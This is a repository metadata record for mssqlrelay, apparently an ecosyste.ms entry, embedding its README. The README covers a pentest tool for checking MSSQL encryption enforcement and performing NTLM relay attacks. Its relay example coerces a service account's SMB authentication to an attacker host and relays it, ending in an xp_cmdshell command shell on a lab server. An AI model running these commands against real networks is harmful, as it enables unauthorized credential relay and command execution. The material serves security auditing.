{"id":23196673,"url":"https://github.com/compasssecurity/mssqlrelay","last_synced_at":"2025-08-18T22:31:58.861Z","repository":{"id":198489616,"uuid":"634845154","full_name":"CompassSecurity/mssqlrelay","owner":"CompassSecurity","description":"Tool for MSSQL relay audit and abuse","archived":false,"fork":false,"pushed_at":"2024-03-06T15:02:49.000Z","size":80,"stargazers_count":22,"open_issues_count":0,"forks_count":6,"subscribers_count":5,"default_branch":"main","last_synced_at":"2024-03-07T16:04:17.409Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/CompassSecurity.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2023-05-01T11:00:24.000Z","updated_at":"2024-03-07T16:04:17.410Z","dependencies_parsed_at":null,"dependency_job_id":"4c373e3b-9093-437c-992e-2adc91faa688","html_url":"https://github.com/CompassSecurity/mssqlrelay","commit_stats":null,"previous_names":["compasssecurity/mssqlrelay"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CompassSecurity%2Fmssqlrelay","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CompassSecurity%2Fmssqlrelay/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CompassSecurity%2Fmssqlrelay/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CompassSecurity%2Fmssqlrelay/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/CompassSecurity","download_url":"ht
tps://codeload.github.com/CompassSecurity/mssqlrelay/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":230284198,"owners_count":18202347,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-18T14:20:00.882Z","updated_at":"2024-12-18T14:20:01.569Z","avatar_url":"https://github.com/CompassSecurity.png","language":"Python","readme":"# MSSQLRelay\n\nMicrosoft SQL Relay is an offensive tool for auditing and abusing Microsoft SQL (MSSQL) services.\n\n## Installation\n\nInstall the dev branch of impacket, then install the mssqlrelay package:\n```bash\npip3 install git+https://github.com/fortra/impacket.git\npip3 install git+https://github.com/CompassSecurity/mssqlrelay.git\n```\n\n## Usage\n\n```bash\n$ mssqlrelay       \nMSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)\n\nusage: mssqlrelay [-v] [-h] [-debug] {check,checkall,relay} ...\n\nMicrosoft SQL Relaying Tool\n\npositional arguments:\n  {check,checkall,relay}\n                        Action\n    check               Check if server enforces encryption\n    checkall            Lists MSSQL servers (from LDAP), check if user has access and encryption settings\n    relay               NTLM Relay to MS SQL Endpoints\n\noptions:\n  -v, --version         Show MSSQLRelay's version number and exit\n  -h, --help            Show this help message and exit\n  -debug                Turn debug output on\n```\n\n### Check\n\nRun checks against a single server (target).\nReturns information about the 
server and if encryption is enforced or not.\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cb\u003eOptions\u003c/b\u003e\u003c/summary\u003e\n\n```bash\n$ mssqlrelay check -h                                                                                                                \nMSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)\n\nusage: mssqlrelay check [-h] [-dc-ip ip address] [-target-ip ip address] [-target dns/ip address] [-ns nameserver] [-dns-tcp] [-timeout seconds] [-u username@domain] [-p password] [-hashes [LMHASH:]NTHASH] [-k] [-windows-auth] [-sspi] [-aes hex key] [-no-pass] [-mssql-port port] [-mssql-db db name]\n\noptions:\n  -h, --help            show this help message and exit\n\nconnection options:\n  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter\n  -target-ip ip address\n                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it\n  -target dns/ip address\n                        DNS Name or IP Address of the target machine. Required for Kerberos or SSPI authentication\n  -ns nameserver        Nameserver for DNS resolution\n  -dns-tcp              Use TCP instead of UDP for DNS queries\n  -timeout seconds      Timeout for connections\n\nauthentication options:\n  -u username@domain, -username username@domain\n                        Username. Format: username@domain\n  -p password, -password password\n                        Password\n  -hashes [LMHASH:]NTHASH\n                        NTLM hash, format is [LMHASH:]NTHASH\n  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. 
If valid credentials cannot be found, it will use the ones specified in the command line\n  -windows-auth         whether or not to use Windows Authentication (default True)\n  -sspi                 Use Windows Integrated Authentication (SSPI)\n  -aes hex key          AES key to use for Kerberos Authentication (128 or 256 bits)\n  -no-pass              Don't ask for password (useful for -k and -sspi)\n\nMSSQL options:\n  -mssql-port port      MSSQL port to log in to\n  -mssql-db db name     MSSQL database instance (default None)\n```\n\u003c/details\u003e\n\n#### Typical usage\n```bash\n$ mssqlrelay check -target ws1.child.testlab.local -ns 10.0.1.100 -u tmassie@child.testlab.local -p 'Burp!=B33F' -windows-auth\nMSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)\n\n[+] Trying to resolve 'ws1.child.testlab.local' at '10.0.1.100'\n[+] Trying to resolve 'CHILD.TESTLAB.LOCAL' at '10.0.1.100'\n[*] ws1.child.testlab.local (10.0.1.103:1433)\n[*]   -  Version: Microsoft SQL Server 2019 RTM (15.0.2000)\n[*]   -  Encryption: not enforced\n[*]   -  Login: successful (as TMASSIE)\n[*]   -  DB user: guest\n[*]   -  Database: master\n```\n\n### CheckAll\n\nRun checks against all MSSQL SPNs in the domain. 
Target is a domain controller.\nReturns information about all servers and their configuration.\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cb\u003eOptions\u003c/b\u003e\u003c/summary\u003e\n\n```bash\n$ mssqlrelay checkall -h\nMSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)\n\nusage: mssqlrelay checkall [-h] [-scheme ldap scheme] [-dc-ip ip address] [-target-ip ip address] [-target dns/ip address] [-ns nameserver] [-dns-tcp] [-timeout seconds] [-u username@domain] [-p password] [-hashes [LMHASH:]NTHASH] [-k] [-windows-auth] [-sspi] [-aes hex key] [-no-pass] [-mssql-port port]\n                           [-mssql-db db name]\n\noptions:\n  -h, --help            show this help message and exit\n\nconnection options:\n  -scheme ldap scheme\n  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter\n  -target-ip ip address\n                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it\n  -target dns/ip address\n                        DNS Name or IP Address of the target machine. Required for Kerberos or SSPI authentication\n  -ns nameserver        Nameserver for DNS resolution\n  -dns-tcp              Use TCP instead of UDP for DNS queries\n  -timeout seconds      Timeout for connections\n\nauthentication options:\n  -u username@domain, -username username@domain\n                        Username. Format: username@domain\n  -p password, -password password\n                        Password\n  -hashes [LMHASH:]NTHASH\n                        NTLM hash, format is [LMHASH:]NTHASH\n  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. 
If valid credentials cannot be found, it will use the ones specified in the command line\n  -windows-auth         whether or not to use Windows Authentication (default True)\n  -sspi                 Use Windows Integrated Authentication (SSPI)\n  -aes hex key          AES key to use for Kerberos Authentication (128 or 256 bits)\n  -no-pass              Don't ask for password (useful for -k and -sspi)\n\nMSSQL options:\n  -mssql-port port      MSSQL port to log in to\n  -mssql-db db name     MSSQL database instance (default None)\n```\n\u003c/details\u003e\n\n#### Typical usage\n```bash\n$ mssqlrelay checkall -scheme ldap -target child.testlab.local -ns 10.0.1.100 -u tmassie@child.testlab.local -p 'Burp!=B33F' -windows-auth\nMSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)\n\n[*] SPNs in domain CHILD.TESTLAB.LOCAL:\n[*]   - MSSQLSvc/fs1.child.testlab.local:1433 (running as svc_sql)\n[*]   - MSSQLSvc/ws1.child.testlab.local:1433 (running as svc_sql)\n[*] Checking found instances ...\n[*] fs1.child.testlab.local (10.0.1.101:1433)\n[*]   -  Version: Microsoft SQL Server 2019 RTM (15.0.2000)\n[*]   -  Encryption: enforced\n[*]   -  Login: successful (as TMASSIE)\n[*]   -  DB user: guest\n[*]   -  Database: master\n[*]   -  Privileges: ['xp_dirtree', 'xp_fileexist']\n[*] ws1.child.testlab.local (10.0.1.103:1433)\n[*]   -  Version: Microsoft SQL Server 2019 RTM (15.0.2000)\n[*]   -  Encryption: not enforced\n[*]   -  Login: successful (as TMASSIE)\n[*]   -  DB user: guest\n[*]   -  Database: master\n```\n\n### Relay\n\nConnects to victim server (`-target`) as user (`-u`) to trigger SMB connection as service account to attacker (`attacker`) and relay to target server (`relaytarget`).\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cb\u003eOptions\u003c/b\u003e\u003c/summary\u003e\n\n```bash\n$ mssqlrelay checkall -h\nMSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security 
(https://www.compass-security.com)\n\nusage: mssqlrelay checkall [-h] [-scheme ldap scheme] [-dc-ip ip address] [-target-ip ip address] [-target dns/ip address] [-ns nameserver] [-dns-tcp] [-timeout seconds] [-u username@domain] [-p password] [-hashes [LMHASH:]NTHASH] [-k] [-windows-auth] [-sspi] [-aes hex key] [-no-pass] [-mssql-port port]\n                           [-mssql-db db name]\n\noptions:\n  -h, --help            show this help message and exit\n\nconnection options:\n  -scheme ldap scheme\n  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter\n  -target-ip ip address\n                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it\n  -target dns/ip address\n                        DNS Name or IP Address of the target machine. Required for Kerberos or SSPI authentication\n  -ns nameserver        Nameserver for DNS resolution\n  -dns-tcp              Use TCP instead of UDP for DNS queries\n  -timeout seconds      Timeout for connections\n\nauthentication options:\n  -u username@domain, -username username@domain\n                        Username. Format: username@domain\n  -p password, -password password\n                        Password\n  -hashes [LMHASH:]NTHASH\n                        NTLM hash, format is [LMHASH:]NTHASH\n  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. 
If valid credentials cannot be found, it will use the ones specified in the command line\n  -windows-auth         whether or not to use Windows Authentication (default True)\n  -sspi                 Use Windows Integrated Authentication (SSPI)\n  -aes hex key          AES key to use for Kerberos Authentication (128 or 256 bits)\n  -no-pass              Don't ask for password (useful for -k and -sspi)\n\nMSSQL options:\n  -mssql-port port      MSSQL port to log in to\n  -mssql-db db name     MSSQL database instance (default None)\n```\n\u003c/details\u003e\n\n#### Typical usage\n```bash\n$ mssqlrelay relay -target fs1.child.testlab.local -u tmassie@child.testlab.local -p 'Burp!=B33F' ws1.child.testlab.local 10.0.1.15 \nMSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)\n\n[*] Listening on 0.0.0.0:445\n[*] Authenticating to victim 10.0.1.101\n[*] Triggering connection to \\\\10.0.1.15\\vKCIsdeX\n[!] Press help for extra shell commands\nSQL (child\\svc_sql  dbo@master)\u003e xp_cmdshell whoami\noutput          \n-------------   \nchild\\svc_sql   \n\nNULL        \n```\n\n## Contact\n\nPlease submit any bugs, issues, questions, or feature requests under \"Issues\" or send them to me on Twitter [@sploutchy](https://twitter.com/sploutchy).\n\n## Credits\n\n- [Alberto Solino](https://twitter.com/agsolino) and the whole team at impacket\n- [Oliver Lyak](https://twitter.com/ly4k_) as I stole the project structure from [certipy](https://github.com/ly4k/Certipy)\n- [Dirk-jan Mollema](https://twitter.com/_dirkjan) for his great contributions to impacket","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcompasssecurity%2Fmssqlrelay","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcompasssecurity%2Fmssqlrelay","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcompasssecurity%2Fmssqlrelay/lists"}